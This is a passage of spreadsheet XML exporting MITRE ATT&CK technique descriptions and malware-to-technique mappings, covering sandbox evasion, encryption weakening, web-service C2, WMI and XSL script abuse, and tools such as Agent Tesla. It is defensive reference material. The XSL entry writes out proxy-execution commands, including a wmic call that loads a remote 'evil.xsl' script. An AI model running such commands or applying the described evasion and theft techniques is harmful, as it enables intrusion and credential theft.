Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t xml:space="preserve">Time-based evasion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</si>
  <si>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T1497.002</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: User Activity Based Checks</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. 
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t xml:space="preserve">User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. </t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Encryption</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>Weaken Encryption: Disable Crypto Hardware</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/002</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Weaken Encryption: Reduce Key Space</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.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Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102</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</si>
  <si>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(e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Web Service: Bidirectional Communication</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/002</t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>Web Service: Dead Drop Resolver</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.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
Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/001</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</si>
  <si>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User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Web Service: One-Way Communication</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/003</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Avneet Singh; Casey Smith; Praetorian</t>
  </si>
  <si>
    <t>source ID</t>
  </si>
  <si>
    <t>source name</t>
  </si>
  <si>
    <t>source type</t>
  </si>
  <si>
    <t>mapping type</t>
  </si>
  <si>
    <t>target ID</t>
  </si>
  <si>
    <t>target name</t>
  </si>
  <si>
    <t>target type</t>
  </si>
  <si>
    <t>mapping description</t>
  </si>
  <si>
    <t>software</t>
  </si>
  <si>
    <t>uses</t>
  </si>
  <si>
    <t>technique</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to retrieve metadata for files on disk as well as a command to list the current working directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&amp;%9&amp;jkMCXuiS. [3PARA RAT](https://attack.mitre.org/software/S0066) will use an 8-byte XOR key derived from the string HYF54&amp;%9&amp;jkMCXuiS if the DES decoding fails(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to set certain attributes such as creation/modification timestamps on files.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain file and directory listings.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain a listing of running processes (including loaded modules).(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) obfuscates C2 communication using a 1-byte XOR with the key 0xBE.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) sends an OS version identifier in its beacons.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to create a remote shell.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to download files from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to identify the installed anti-virus product on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with RSA.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Some variants of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) exfiltrates data over the same channel used for C2.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can delete files and directories.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list files and directories.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can perform keylogging.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Local Data Staging</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) stores output from command execution in a .dat file in the %TEMP% directory.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of setting and deleting Registry values.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of starting a process using CreateProcess.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Most of the strings in [ADVSTORESHELL](https://attack.mitre.org/software/S0045) are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.(Citation: Kaspersky Sofacy)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list connected devices.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list running processes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can enumerate registry keys.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieves persistence by adding itself to the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>C2 traffic from [ADVSTORESHELL](https://attack.mitre.org/software/S0045) is encrypted, then encoded with Base64 encoding.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with 3DES.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can run [Systeminfo](https://attack.mitre.org/software/S0096) to gather information about the victim.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can create a remote shell and run a given command.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. The ASPXTool version used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) has been deployed to accessible servers running Internet Information Services (IIS).(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain users.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>Domain Groups</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain groups.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can gather information about organizational units (OUs) and domain trusts from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) has the ability to query Active Directory for computers.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can extract subnet information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can encrypt data with 3DES before sending it over to a C2 server.(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim’s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from configuration or support files.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to steal credentials from FTP clients and wireless profiles.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can gather credentials from a number of browsers.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from the Registry.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the capability to kill any running analysis processes and AV software.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has created hidden folders.(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used &lt;code&gt;ProcessWindowStyle.Hidden&lt;/code&gt; to hide windows.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can download additional files for execution on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>Local Account</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect account information from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Malicious File</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has been executed through malicious e-mail attachments (Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to use form-grabbing to extract data from web data forms.(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can achieve persistence by modifying Registry key entries.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has had its code obfuscated in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018) [Agent Tesla](https://attack.mitre.org/software/S0331) has used the Rijndael symmetric encryption algorithm to encrypt strings.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can list the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can inject into known, vulnerable binaries on targeted hosts.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can add itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has dropped RegAsm.exe onto systems for performing malicious activity.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331)  has achieved persistence via scheduled tasks.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim’s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t xml:space="preserve">The primary delivered mechaism for [Agent Tesla](https://attack.mitre.org/software/S0331) is through email phishing messages.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
